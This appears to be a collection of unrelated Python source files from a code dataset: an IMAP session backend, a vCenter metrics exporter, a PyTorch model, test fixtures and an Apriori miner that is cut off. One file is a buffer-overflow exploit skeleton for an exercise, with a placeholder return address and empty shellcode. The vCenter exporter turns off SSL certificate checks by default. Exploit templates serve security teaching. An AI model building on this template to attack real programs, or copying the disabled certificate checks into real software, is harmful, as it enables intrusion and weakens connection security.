'steering_angle': steering_angle.__str__(),\n 'throttle': throttle.__str__()\n }, skip_sid=True)\n\nif __name__ == '__main__':\n app = socketio.Middleware(sio, app)\n eventlet.wsgi.server(eventlet.listen(('', 4567)), app)\n\n","sub_path":"main_bridge.py","file_name":"main_bridge.py","file_ext":"py","file_size_in_byte":2364,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"12678705","text":"from os import path\nimport json\n\n# from leanda.api import nodes\n\n\nclass Session():\n path = '{}/.leanda.json'.format(path.expanduser('~'))\n\n token: str\n owner: str\n cwd: str\n user: {}\n\n def __getattribute__(self, name):\n if name in dir(Session):\n return super().__getattribute__(name)\n return self.load().get(name, None)\n\n def __setattr__(self, name, value):\n self.update({name: value})\n return super().__setattr__(name, value)\n\n def save(self, session):\n with open(self.path, 'w') as f:\n json.dump(session, f, indent=4)\n\n def update(self, session_params):\n if path.exists(self.path):\n session = self.load()\n else:\n session = {}\n session.update(session_params)\n self.save(session)\n\n def load(self):\n if path.exists(self.path):\n with open(self.path, 'r') as f:\n return json.load(f)\n else:\n print('The last session not found')\n return {'token': '', 'cwd': '', 'owner': '', }\n\n\nsession = Session()\n","sub_path":"leanda/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"293764173","text":"#!/usr/bin/env python\n\nfrom pyVmomi import vim\nfrom prometheus_client import start_http_server, Summary, Counter, Gauge\nfrom tools import cli\nfrom pyVim.connect import SmartConnect, Disconnect\nimport atexit\nimport ssl\nimport datetime\nfrom yamlconfig import YamlConfig\nimport argparse\n\ndefaults = {\n 'vcenter_ip': 'localhost',\n 'vcenter_user': 'administrator@vsphere.local',\n 'vcenter_password': 'password',\n 'ignore_ssl': True\n }\n\ndef main():\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-c\", 
\"--config\",\n help=\"Specify config file\", metavar=\"FILE\")\n args, remaining_argv = parser.parse_known_args()\n config = YamlConfig(args.config, defaults)\n\n # Start up the server to expose the prometheus metrics\n start_http_server(8000)\n\n # Connect to the host without SSL signing\n si=None\n context = None\n if config['main']['ignore_ssl'] and \\\n hasattr(ssl, \"_create_unverified_context\"):\n context = ssl._create_unverified_context()\n\n try:\n si = SmartConnect(host=config['main']['host'],\n user=config['main']['user'],\n pwd=config['main']['password'],\n port=int(config['main']['port']),\n sslContext=context)\n atexit.register(Disconnect, si)\n\n except IOError as e:\n pass\n\n if not si:\n raise SystemExit(\"Unable to connect to host with supplied info.\")\n\n content = si.RetrieveContent()\n perfManager = content.perfManager\n\n\n##############################################################################\n # create a list of vim.VirtualMachine objects so that we can query them for statistics\n container = content.rootFolder\n viewType = [vim.VirtualMachine]\n recursive = True\n\n# REQUEST CreateContainerView\n containerView = content.viewManager.CreateContainerView(container,\n viewType,\n recursive)\n\n children = containerView.view\n count_vms=len(children)\n print(\"Count of VMs:\" + str(count_vms))\n print('CreateContainerView: Start: Date now: %s' % datetime.datetime.now())\n\n##############################################################################\n # create a mapping from performance stats to their counterIDs\n # counterInfo: [performance stat => counterId]\n # performance stat example: cpu.usagemhz.LATEST\n # counterId example: 6\n print('Start: Date now: %s' % datetime.datetime.now())\n counterInfo = {}\n counterids=perfManager.QueryPerfCounterByLevel(level=4)\n\n g = {}\n for c in counterids:\n fullName = c.groupInfo.key + \".\" + c.nameInfo.key + \".\" + c.rollupType\n print(fullName + \": \" + str(c.key))\n counterInfo[fullName] = c.key\n\n # define a gauges for the counter ids\n g[fullName.replace('.','_')] = Gauge(fullName.replace('.','_'), fullName.replace('.','_'), ['vmware_name'])\n\n print('QueryPerfCounterByLevel: Date now: %s' % datetime.datetime.now())\n collected=config['main']['vm_metrics']\n counterIDs = [counterInfo[k] for k in collected if k in counterInfo]\n# counterIDs = [m.key for m in counterids]\n\n# REQUEST MetricId\n# metricIDs = [vim.PerformanceManager.MetricId(counterId=c,\n# instance=\"*\")\n# for c in counterIDs]\n# print('MetricId: Start: Date now: %s' % datetime.datetime.now())\n########################################################################################\n # loop over all vmware machines\n for child in children:\n # only consider machines which have an annotation and are powered on\n if child.summary.config.annotation and child.summary.runtime.powerState==\"poweredOn\":\n # split the multi-line annotation into a dict per property (name, project-id, ...)\n lis=child.summary.config.annotation.split('\\n')\n d = dict(s.rsplit(':',1) for s in filter(None, lis))\n\n# REQUEST MetricID\n metricIDs = [vim.PerformanceManager.MetricId(counterId=c,\n instance=\"*\")\n for c in counterIDs]\n print('MetricId: Start: Date now: %s' % datetime.datetime.now())\n\n# print(metricIDs)\n# REQUEST QuerySpec - build query spec for the next metric query\n spec = vim.PerformanceManager.QuerySpec(maxSample=1,\n entity=child,\n metricId=metricIDs,\n intervalId=20)\n\n print('QuerySpec: Start: Date now: %s' % datetime.datetime.now())\n# 
REQUEST QueryStats - get metrics from vcenter\n result = perfManager.QueryStats(querySpec=[spec])\n print('QueryStats: Start: Date now: %s' % datetime.datetime.now())\n # Loop through the results and print the output\n output = \"\"\n for r in result:\n# if child.summary.config.annotation and child.summary.runtime.powerState==\"poweredOn\":\n # loop over the metrics\n for val in result[0].value:\n if val:\n # print vmware name\n# output += \"id:\" + child.summary.config.name + \",\"\n # print key names\n# output += counterInfo.keys()[counterInfo.values().index(val.id.counterId)]\n # print key values plus metadata\n# output += \": \" + str(val.value[0]) + \", name:\" + d['name'] + \", project_id:\" + d['projectid'] + \"\\n\"\n# output += \"\\n\"\n # try to remove empty lines (maybe does not seem to work)\n# print(filter(None, output))\n# if counterInfo.keys()[counterInfo.values().index(val.id.counterId)] == 'cpu.usage.average':\n # send metrics to prometheus exporter\n g[counterInfo.keys()[counterInfo.values().index(val.id.counterId)].replace('.','_')].labels(d['name']).set(val.value[0])\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"samples/o-test.py","file_name":"o-test.py","file_ext":"py","file_size_in_byte":6116,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"117445614","text":"# -*- coding: utf-8 -*-\n\"\"\"\n @File : model.py\n @Time : 2020/7/2 10:50 AM\n @Author : yizuotian\n @Description :\n\"\"\"\nimport torch.nn.functional as F\nfrom torch import nn\nfrom torchvision import models\n\n\nclass EncoderDecoder(nn.Module):\n def __init__(self, num_classes, **kwargs):\n super(EncoderDecoder, self).__init__(**kwargs)\n self.num_classes = num_classes\n # the first layer takes a single input channel\n self.conv = nn.Conv2d(1, 64, kernel_size=(3, 3), padding=(1, 1), stride=(1, 1))\n self.bn = nn.BatchNorm2d(64)\n # use a pretrained base model as the feature extractor\n self.cnn = self.feature_extractor()\n # classification head\n self.fc = nn.Linear(512, num_classes)\n\n def forward(self, x):\n \"\"\"\n\n :param x: [B,C,H,W]\n :return:\n \"\"\"\n x = F.relu(self.bn(self.conv(x)), True)\n x = F.max_pool2d(x, kernel_size=(2, 1), stride=(2, 1))\n x = self.cnn(x)\n\n x = x.permute(0, 2, 3, 1) # [B,C,H,W]=>[B,H,W,C]\n x = self.fc(x)\n x = F.softmax(x, dim=-1)\n\n return x\n\n @classmethod\n def feature_extractor(cls):\n return nn.Identity()\n\n\nclass ResNetEncoderDecoder(EncoderDecoder):\n @classmethod\n def feature_extractor(cls):\n resnet = models.resnet18(pretrained=True)\n return nn.Sequential(*list(resnet.children())[4:-2])\n\n\nif __name__ == '__main__':\n import torchsummary\n\n net = ResNetEncoderDecoder(32)\n torchsummary.summary(net, input_size=(1, 32, 200))\n","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1480,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"522075413","text":"import os\nimport socket\nimport time\n\nimport docker\nimport responses\n\nfrom pytest_mock_resources.compat import functools\n\nIN_CI = os.getenv(\"CI\") == \"true\" # type: bool\n\n\n@functools.lru_cache()\ndef get_docker_host():\n host = \"host.docker.internal\"\n try:\n socket.gethostbyname(host)\n return host\n except socket.gaierror:\n return os.environ.get(\"PYTEST_MOCK_RESOURCES_HOST\", \"localhost\")\n\n\nclass ContainerCheckFailed(Exception):\n \"\"\"Unable to connect to a Container.\n \"\"\"\n\n\ndef get_container_fn(name, image, ports, environment, check_fn):\n def wrapped():\n # XXX: moto library may over-mock responses. 
SEE: https://github.com/spulec/moto/issues/1026\n responses.add_passthru(\"http+docker\")\n\n def retriable_check_fn(retries):\n while retries:\n retries -= 1\n try:\n check_fn()\n return\n except Exception:\n if not retries:\n raise\n time.sleep(1)\n\n try:\n container = None\n try:\n retriable_check_fn(1)\n except ContainerCheckFailed:\n client = docker.from_env(version=\"auto\")\n container = client.containers.run(\n image, ports=ports, environment=environment, detach=True, remove=True\n )\n retriable_check_fn(20)\n\n yield\n except Exception:\n raise\n\n finally:\n if container:\n container.kill()\n\n wrapped.__name__ = name\n\n return wrapped\n\n\n# flake8: noqa\nfrom pytest_mock_resources.container.mongo import _mongo_container # isort:skip\nfrom pytest_mock_resources.container.postgres import _postgres_container # isort:skip\nfrom pytest_mock_resources.container.redis import _redis_container # isort:skip\nfrom pytest_mock_resources.container.redshift import _redshift_container # isort:skip\nfrom pytest_mock_resources.container.mysql import _mysql_container # isort:skip\n","sub_path":"src/pytest_mock_resources/container/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"572052090","text":"import threading\nimport time\nimport schedule\n\ndef MyThread1():\n while True:\n \tprint ('Hello')\n \ttime.sleep(20)\n\ndef MyThread2():\n\tprint ('thread 2 started')\n\twhile True:\n\t\tschedule.run_pending()\n\t\ttime.sleep(1)\n\ndef job():\n\tprint ('scheduler job fired')\n\n\n\nschedule.every(2).minutes.do(job)\n\nt1 = threading.Thread(target=MyThread1, args=[])\nt2 = threading.Thread(target=MyThread2, args=[])\n\nt1.start()\nt2.start()\n\n\n\nwhile True:\n\tprint ('asdf')\n\ttime.sleep(30)\n","sub_path":"thread_test.py","file_name":"thread_test.py","file_ext":"py","file_size_in_byte":522,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"177781690","text":"#!/usr/local/bin/python3\n\nimport os, subprocess, shutil\n\nflygenedata = open(\"data.csv\")\n\nfor geneline in flygenedata :\n# Make each line into a list, using split() and comma as delimiter\n gene_info = geneline.split(\",\")\n# Define our variables from the split()-generated list elements\n species = gene_info[0]\n geneseqs = gene_info[1].upper()\n seqlengths = len(gene_info[1])\n genenames = gene_info[2]\n expressionlevel = int(gene_info[3])\n# AT content calculations, default status is \"low\"\n atcontent = (geneseqs.count('A')+geneseqs.count('T'))/seqlengths\n atstatus = \"low\"\n if(atcontent >= 0.45 and atcontent <= 0.65) :\n atstatus=\"medium\"\n if(atcontent>0.65) :\n atstatus=\"high\" \n# Answer the questions, also including a \"condition fail\" output for checking purposes\n if \"melanogaster\" in species or \"simulans\" in species:\n print(\"Question 1 (melanogaster or simulans): \"+ species + \" \"+genenames)\n else :\n print(\"Question 1 (FAIL): \"+ species + \" \"+genenames)\n if seqlengths > 90 and seqlengths < 110:\n print(\"Question 2 (seqlength >90 and <110): \"+ species + \" \"+genenames)\n else :\n print(\"Question 2 (FAIL): \"+ species + \" \"+genenames)\n if atcontent < 0.5 and expressionlevel > 200:\n print(\"Question 3 (AT content <0.5, expr > 200): \"+ species + \" \"+genenames)\n else :\n print(\"Question 3 (FAIL): \"+ species + \" \"+genenames)\n if (genenames.startswith(\"k\") or 
genenames.startswith(\"h\")) and (\"Drosophila melanogaster\" not in species) :\n print(\"Question 4 (names start with k or h, not melanogaster): \" + species + \" \" + genenames)\n else :\n print(\"Question 4 (FAIL): \" + species + \" \" + genenames)\n print(\"Question 5 (AT content status): \" + genenames + \" \" + atstatus)\n\n\n\n\n","sub_path":"t1.py","file_name":"t1.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"573023846","text":"#!/usr/bin/python3\n\n\nfrom pwn import *\n\nshellcode = b\"\"\n\n## Control EIP\n\nbuffer = b''\nbuffer += b'A'*100\nbuffer += p32(0xdeadbeef) #EIP \nbuffer += b'B'*100\n\n\n# Exploit (the magic happen here)\n\nexploit = buffer\nexploit += shellcode\nexploit += b'B'*200 #...\n\n\n## Write to binary file\n\nf = open(\"exploit.bin\",\"wb\")\nf.write(exploit)\nf.close()\n\n\nprint(\"Exploit is ready !\\n Use `cat exploit.bin - | ./` to use your exploit.\")\n\n","sub_path":"exercices/exploit_squeleton.py","file_name":"exploit_squeleton.py","file_ext":"py","file_size_in_byte":441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"359851400","text":"\nfrom abc import abstractmethod\nfrom asyncio import shield\nfrom typing import Tuple, Optional, FrozenSet, Iterable, Sequence, List\nfrom typing_extensions import Protocol\n\nfrom pymap.concurrent import Event\nfrom pymap.config import IMAPConfig\nfrom pymap.exceptions import MailboxNotFound, MailboxReadOnly\nfrom pymap.flags import FlagOp, SessionFlags, PermanentFlags\nfrom pymap.listtree import ListTree\nfrom pymap.mailbox import MailboxSnapshot\nfrom pymap.parsing.specials import SequenceSet, SearchKey, \\\n FetchAttribute, FetchRequirement\nfrom pymap.parsing.specials.flag import Flag, Seen\nfrom pymap.parsing.response.code import AppendUid, CopyUid\nfrom pymap.interfaces.message import AppendMessage\nfrom pymap.interfaces.session import SessionInterface\nfrom pymap.search import SearchParams, SearchCriteriaSet\nfrom pymap.selected import SelectedMailbox\n\nfrom .mailbox import MailboxDataInterface, MailboxSetInterface, MessageT\n\n__all__ = ['BaseSession']\n\n\nclass BaseSession(SessionInterface, Protocol[MessageT]):\n \"\"\"Base implementation of\n :class:`~pymap.interfaces.session.SessionInterface` intended for use by\n most backends.\n\n \"\"\"\n\n @property\n @abstractmethod\n def config(self) -> IMAPConfig:\n ...\n\n @property\n @abstractmethod\n def mailbox_set(self) \\\n -> MailboxSetInterface[MailboxDataInterface[MessageT]]:\n ...\n\n async def _load_updates(self, selected: Optional[SelectedMailbox],\n mbx: Optional[MailboxDataInterface[MessageT]]) \\\n -> Optional[SelectedMailbox]:\n if selected:\n if not mbx or selected.name != mbx.name:\n try:\n mbx = await self.mailbox_set.get_mailbox(selected.name)\n except MailboxNotFound:\n selected.set_deleted()\n return selected\n return await mbx.update_selected(selected)\n return selected\n\n @classmethod\n def _find_selected(cls, selected: Optional[SelectedMailbox],\n mbx: MailboxDataInterface[MessageT]) \\\n -> Optional[SelectedMailbox]:\n if selected and selected.name == mbx.name:\n return selected\n return mbx.selected_set.any_selected\n\n async def list_mailboxes(self, ref_name: str, filter_: str,\n subscribed: bool = False,\n selected: SelectedMailbox = None) \\\n -> Tuple[Iterable[Tuple[str, Optional[str], Sequence[bytes]]],\n Optional[SelectedMailbox]]:\n delimiter = self.mailbox_set.delimiter\n 
if filter_:\n list_tree = ListTree(delimiter).update('INBOX')\n if subscribed:\n list_tree.update(*await self.mailbox_set.list_subscribed())\n else:\n list_tree.update(*await self.mailbox_set.list_mailboxes())\n ret = [(entry.name, delimiter, entry.attributes)\n for entry in list_tree.list_matching(ref_name, filter_)]\n else:\n ret = [(\"\", delimiter, [b'Noselect'])]\n return ret, await self._load_updates(selected, None)\n\n async def get_mailbox(self, name: str, selected: SelectedMailbox = None) \\\n -> Tuple[MailboxSnapshot, Optional[SelectedMailbox]]:\n mbx = await self.mailbox_set.get_mailbox(name)\n snapshot = await mbx.snapshot()\n return snapshot, await self._load_updates(selected, mbx)\n\n async def create_mailbox(self, name: str,\n selected: SelectedMailbox = None) \\\n -> Optional[SelectedMailbox]:\n await self.mailbox_set.add_mailbox(name)\n return await self._load_updates(selected, None)\n\n async def delete_mailbox(self, name: str,\n selected: SelectedMailbox = None) \\\n -> Optional[SelectedMailbox]:\n await self.mailbox_set.delete_mailbox(name)\n return await self._load_updates(selected, None)\n\n async def rename_mailbox(self, before_name: str, after_name: str,\n selected: SelectedMailbox = None) \\\n -> Optional[SelectedMailbox]:\n await self.mailbox_set.rename_mailbox(before_name, after_name)\n return await self._load_updates(selected, None)\n\n async def subscribe(self, name: str, selected: SelectedMailbox = None) \\\n -> Optional[SelectedMailbox]:\n mbx = await self.mailbox_set.get_mailbox('INBOX')\n await self.mailbox_set.set_subscribed(name, True)\n return await self._load_updates(selected, mbx)\n\n async def unsubscribe(self, name: str, selected: SelectedMailbox = None) \\\n -> Optional[SelectedMailbox]:\n mbx = await self.mailbox_set.get_mailbox('INBOX')\n await self.mailbox_set.set_subscribed(name, False)\n return await self._load_updates(selected, mbx)\n\n async def append_messages(self, name: str,\n messages: Sequence[AppendMessage],\n selected: SelectedMailbox = None) \\\n -> Tuple[AppendUid, Optional[SelectedMailbox]]:\n mbx = await self.mailbox_set.get_mailbox(name, try_create=True)\n if mbx.readonly:\n raise MailboxReadOnly(name)\n dest_selected = self._find_selected(selected, mbx)\n uids: List[int] = []\n for append_msg in messages:\n msg = await mbx.add(append_msg, recent=not dest_selected)\n if dest_selected:\n dest_selected.session_flags.add_recent(msg.uid)\n uids.append(msg.uid)\n mbx.selected_set.updated.set()\n return (AppendUid(mbx.uid_validity, uids),\n await self._load_updates(selected, mbx))\n\n async def select_mailbox(self, name: str, readonly: bool = False) \\\n -> Tuple[MailboxSnapshot, SelectedMailbox]:\n mbx = await self.mailbox_set.get_mailbox(name)\n selected = SelectedMailbox(name, readonly or mbx.readonly,\n PermanentFlags(mbx.permanent_flags),\n SessionFlags(mbx.session_flags),\n selected_set=mbx.selected_set)\n if not selected.readonly:\n await mbx.claim_recent(selected)\n snapshot = await mbx.snapshot()\n return snapshot, await mbx.update_selected(selected)\n\n async def check_mailbox(self, selected: SelectedMailbox, *,\n wait_on: Event = None,\n housekeeping: bool = False) -> SelectedMailbox:\n mbx = await self.mailbox_set.get_mailbox(selected.name)\n if housekeeping:\n await shield(mbx.cleanup())\n if wait_on is not None:\n either_event = wait_on.or_event(mbx.selected_set.updated)\n await either_event.wait()\n return await mbx.update_selected(selected)\n\n async def fetch_messages(self, selected: SelectedMailbox,\n sequence_set: 
SequenceSet,\n attributes: FrozenSet[FetchAttribute]) \\\n -> Tuple[Iterable[Tuple[int, MessageT]], SelectedMailbox]:\n mbx = await self.mailbox_set.get_mailbox(selected.name)\n req = FetchRequirement.reduce({attr.requirement\n for attr in attributes})\n ret = [(seq, msg) async for seq, msg\n in mbx.find(sequence_set, selected, req)]\n if not selected.readonly and any(attr.set_seen for attr in attributes):\n seen_set = frozenset([Seen])\n await mbx.update_flags([msg for _, msg in ret],\n seen_set, FlagOp.ADD)\n mbx.selected_set.updated.set()\n return ret, await mbx.update_selected(selected)\n\n async def search_mailbox(self, selected: SelectedMailbox,\n keys: FrozenSet[SearchKey]) \\\n -> Tuple[Iterable[Tuple[int, MessageT]], SelectedMailbox]:\n mbx = await self.mailbox_set.get_mailbox(selected.name)\n req = FetchRequirement.reduce({key.requirement for key in keys})\n ret: List[Tuple[int, MessageT]] = []\n params = SearchParams(selected,\n disabled=self.config.disable_search_keys)\n search = SearchCriteriaSet(keys, params)\n async for seq, msg in mbx.find(search.sequence_set, selected, req):\n if search.matches(seq, msg):\n ret.append((seq, msg))\n return ret, await mbx.update_selected(selected)\n\n async def expunge_mailbox(self, selected: SelectedMailbox,\n uid_set: SequenceSet = None) -> SelectedMailbox:\n if selected.readonly:\n raise MailboxReadOnly(selected.name)\n mbx = await self.mailbox_set.get_mailbox(selected.name)\n if not uid_set:\n uid_set = SequenceSet.all(uid=True)\n expunge_uids = await mbx.find_deleted(uid_set, selected)\n await mbx.delete(expunge_uids)\n mbx.selected_set.updated.set()\n return await mbx.update_selected(selected)\n\n async def copy_messages(self, selected: SelectedMailbox,\n sequence_set: SequenceSet,\n mailbox: str) \\\n -> Tuple[Optional[CopyUid], SelectedMailbox]:\n mbx = await self.mailbox_set.get_mailbox(selected.name)\n dest = await self.mailbox_set.get_mailbox(mailbox, try_create=True)\n if dest.readonly:\n raise MailboxReadOnly(mailbox)\n req = FetchRequirement.BODY\n dest_selected = self._find_selected(selected, dest)\n uids: List[Tuple[int, int]] = []\n async for _, msg in mbx.find(sequence_set, selected, req):\n if not msg.expunged:\n source_uid = msg.uid\n msg = await dest.add(msg.append_msg, recent=not dest_selected)\n if dest_selected:\n dest_selected.session_flags.add_recent(msg.uid)\n uids.append((source_uid, msg.uid))\n dest.selected_set.updated.set()\n return (CopyUid(dest.uid_validity, uids),\n await mbx.update_selected(selected))\n\n async def update_flags(self, selected: SelectedMailbox,\n sequence_set: SequenceSet,\n flag_set: FrozenSet[Flag],\n mode: FlagOp = FlagOp.REPLACE) \\\n -> Tuple[Iterable[Tuple[int, MessageT]], SelectedMailbox]:\n if selected.readonly:\n raise MailboxReadOnly(selected.name)\n mbx = await self.mailbox_set.get_mailbox(selected.name)\n permanent_flags = selected.permanent_flags & flag_set\n messages: List[Tuple[int, MessageT]] = []\n async for msg_seq, msg in mbx.find(sequence_set, selected):\n if not msg.expunged:\n selected.session_flags.update(msg.uid, flag_set, mode)\n messages.append((msg_seq, msg))\n await mbx.update_flags([msg for _, msg in messages],\n permanent_flags, mode)\n mbx.selected_set.updated.set()\n return messages, await mbx.update_selected(selected)\n","sub_path":"pymap/backend/session.py","file_name":"session.py","file_ext":"py","file_size_in_byte":11098,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"388816129","text":"\nimport 
operator \nimport itertools\nimport copy\nimport types\n\nfrom ROOT import TLorentzVector\n\nfrom CMGTools.RootTools.fwlite.Analyzer import Analyzer\nfrom CMGTools.RootTools.fwlite.Event import Event\nfrom CMGTools.RootTools.statistics.Counter import Counter, Counters\nfrom CMGTools.RootTools.fwlite.AutoHandle import AutoHandle\nfrom CMGTools.RootTools.physicsobjects.Lepton import Lepton\nfrom CMGTools.RootTools.physicsobjects.Tau import Tau\n\nfrom CMGTools.RootTools.utils.DeltaR import deltaR, deltaPhi, bestMatch\n \nclass ttHTauAnalyzer( Analyzer ):\n\n \n def __init__(self, cfg_ana, cfg_comp, looperName ):\n super(ttHTauAnalyzer,self).__init__(cfg_ana,cfg_comp,looperName)\n\n #----------------------------------------\n # DECLARATION OF HANDLES OF LEPTONS STUFF \n #----------------------------------------\n def declareHandles(self):\n super(ttHTauAnalyzer, self).declareHandles()\n self.handles['taus'] = AutoHandle( ('cmgTauSel',''),'std::vector')\n\n\n def beginLoop(self):\n super(ttHTauAnalyzer,self).beginLoop()\n self.counters.addCounter('events')\n count = self.counters.counter('events')\n count.register('all events')\n count.register('has >=1 tau at preselection')\n count.register('has >=1 selected taus')\n count.register('has >=1 loose taus')\n count.register('has >=1 inclusive taus')\n\n #------------------\n # MAKE LEPTON LISTS\n #------------------\n def makeTaus(self, event):\n event.selectedTaus = []\n event.looseTaus = []\n event.inclusiveTaus = []\n\n #get all\n alltaus = map( Tau, self.handles['taus'].product() )\n\n foundTau = False\n for tau in alltaus:\n tau.associatedVertex = event.goodVertices[0]\n tau.lepVeto = False\n if self.cfg_ana.vetoLeptons:\n for lep in event.selectedLeptons:\n if deltaR(lep.eta(), lep.phi(), tau.eta(), tau.phi()) < self.cfg_ana.leptonVetoDR:\n tau.lepVeto = True\n if tau.lepVeto: continue\n if tau.pt() < self.cfg_ana.ptMin: continue\n if abs(tau.dxy()) > 0.5 or abs(tau.dz()) > 1.0: continue\n foundTau = True\n def id3(tau,X):\n \"\"\"Create an integer equal to 1-2-3 for (loose,medium,tight)\"\"\"\n return tau.tauID(X%\"Loose\") + tau.tauID(X%\"Medium\") + tau.tauID(X%\"Tight\")\n tau.idMVA2 = id3(tau, \"by%sIsolationMVA2\")\n tau.idCI3hit = id3(tau, \"by%sCombinedIsolationDeltaBetaCorr3Hits\")\n #print \"Tau pt %5.1f: idMVA2 %d, idCI3hit %d, %s, %s\" % (tau.pt(), tau.idMVA2, tau.idCI3hit, tau.tauID(self.cfg_ana.tauID), tau.tauID(self.cfg_ana.tauLooseID))\n if tau.tauID(self.cfg_ana.tauID):\n event.selectedTaus.append(tau)\n event.inclusiveTaus.append(tau)\n elif tau.tauID(self.cfg_ana.tauLooseID):\n event.looseTaus.append(tau)\n event.inclusiveTaus.append(tau)\n\n event.selectedTaus.sort(key = lambda l : l.pt(), reverse = True)\n event.looseTaus.sort(key = lambda l : l.pt(), reverse = True)\n self.counters.counter('events').inc('all events')\n if foundTau: self.counters.counter('events').inc('has >=1 tau at preselection')\n if len(event.selectedTaus): self.counters.counter('events').inc('has >=1 selected taus')\n if len(event.looseTaus): self.counters.counter('events').inc('has >=1 loose taus')\n if len(event.inclusiveTaus): self.counters.counter('events').inc('has >=1 inclusive taus')\n def process(self, iEvent, event):\n self.readCollections( iEvent )\n self.makeTaus(event)\n return True\n","sub_path":"CMGTools/TTHAnalysis/python/analyzers/ttHTauAnalyzer.py","file_name":"ttHTauAnalyzer.py","file_ext":"py","file_size_in_byte":3740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} 
+{"seq_id":"322615155","text":"import math\ndef calcula_norma(vetor):\n tamanho=0\n dimensao=len(vetor)\n while dimensao>=1:\n tamanho=(tamanho**2+vetor[dimensao]**2)**(1/2)\n dimensao=dimensao-1\n if dimensao==1:\n return math.fabs(vetor[0])\n else:\n \treturn tamanho","sub_path":"backup/user_312/ch7_2019_03_14_19_55_44_403709.py","file_name":"ch7_2019_03_14_19_55_44_403709.py","file_ext":"py","file_size_in_byte":266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"115055991","text":"from django.conf.urls import url\n\nfrom authentication.views import (thank_you, login_view, logout_view,\n RegistrationView)\n\n\nurlpatterns = [\n url(r'^registration/$', RegistrationView.as_view(), name='registration'),\n url(r'^registration/thank_you/$', thank_you, name='thank_you'),\n\n url(r'^login/$', login_view, name='login'),\n url(r'^logout/$', logout_view, name='logout'),\n]\n","sub_path":"testtask_project/testtask_project/apps/authentication/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"48796174","text":"import sys\nimport os\nimport math\nimport itertools\n\ndef read_csv(filepath):\n\t'''Read transactions from csv_file specified by filepath\n\tArgs:\n\t\t\tfilepath (str): the path to the file to be read\n\n\tReturns:\n\t\t\tlist: a list of lists, where each component list is a list of string representing a transaction\n\n\t'''\n\n\ttransactions = []\n\twith open(filepath, 'r') as f:\n\t\tlines = f.readlines()\n\t\tfor line in lines:\n\t\t\ttransactions.append(line.strip().split(',')[:-1])\n\treturn transactions\n\ndef generateItemSetWithMinSup(transactionsListSet, itemLists, minsup):\n\tresult = list()\n\tfor itemList in itemLists:\n\t\tcount = 0\n\t\tfor transaction in transactionsListSet:\n\t\t\tif all(elem in transaction for elem in itemList):\n\t\t\t\tcount = count+1\n\t\tif count/len(transactionsListSet) >= minsup:\n\t\t\titemList.sort()\n\t\t\tresult.append(itemList)\n\treturn result\n\ndef generateCandiateSet(frequentItemLists, length):\n\tcandiate = []\n\tnumbers = len(frequentItemLists)\n\tif length == 2:\n\t\tfor i in range(numbers -1):\n\t\t\tfor j in range(i+1,numbers):\n\t\t\t\tc = []\n\t\t\t\tc.append(frequentItemLists[i][0])\n\t\t\t\tc.append(frequentItemLists[j][0])\n\t\t\t\tc.sort()\n\t\t\t\tcandiate.append(c)\n\t\treturn candiate\n\n\tfor first in range(numbers-1):\n\t\tfor second in range(first + 1, numbers):\n\t\t\tlist1 = frequentItemLists[first]\n\t\t\tlist2 = frequentItemLists[second]\n\t\t\tc = []\n\t\t\tlist1.sort()\n\t\t\tlist2.sort()\n\t\t\tisNeedMerge = True\n\t\t\tfor i in range(length - 2):\n\t\t\t\tif list1[i] != list2[i]:\n\t\t\t\t\tisNeedMerge = False\n\t\t\t\t\tbreak\n\t\t\tif isNeedMerge:\n\t\t\t\tfor item in list1:\n\t\t\t\t\tc.append(item)\n\t\t\t\tc.append(list2[length-2])\n\t\t\t\tc.sort()\n\t\t\tif c != []:\n\t\t\t\tcandiate.append(c)\n\t\t\t\tc = []\n\treturn candiate\n\n# To be implemented\ndef generate_frequent_itemset(transactions, minsup):\n\tresult = list()\n\tfrequent_itemset = dict()\n\ttransactionsListSet = list()\n\titemSet = set()\n\tfor transaction in transactions:\n\t\ttransactionsListSet.append(transaction)\n\t\tfor item in transaction:\n\t\t\titemSet.add(item)\n\ttemp_list = list()\n\tfor item in itemSet:\n\t\ttemp_list.append([item])\n\tone_item_frequentset = generateItemSetWithMinSup(transactionsListSet, temp_list, minsup)\n\tk = 1\n\tcurrent_frequent_set = 
one_item_frequentset\n\twhile len(current_frequent_set) != 0:\n\t\tfrequent_itemset[k] = current_frequent_set\n\t\tfor item in current_frequent_set:\n\t\t\tresult.append(item)\n\t\tk = k+1\n\t\tcandiateSet = generateCandiateSet(current_frequent_set, k)\n\t\tcurrent_frequent_set = generateItemSetWithMinSup(transactionsListSet, candiateSet, minsup)\n\treturn result\n\n\n\ndef findsubsets(originSet,subSetLength):\n\treturn set(itertools.combinations(originSet,subSetLength))\n# To be implemented\ndef generate_association_rules(transactions, minsup, minconf):\n\t'''Mine the association rules from transactions\n\tArgs:\n\t\t\ttransactions (list): a list of lists, where each component list is a list of string representing a transaction\n\t\t\tminsup (float): specifies the minsup for mining\n\t\t\tminconf (float): specifies the minconf for mining\n\n\tReturns:\n\t\t\tlist: a list of association rule, each rule is represented as a list of string\n\n\tExample:\n\t\t\tOutput: [['root vegetables', 